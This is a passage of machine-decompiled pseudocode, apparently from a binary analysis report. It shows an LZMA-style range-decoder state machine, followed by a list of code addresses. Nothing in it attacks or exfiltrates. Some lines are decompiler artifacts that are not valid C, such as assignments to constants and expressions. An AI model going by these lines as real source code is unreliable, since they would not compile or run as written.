											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
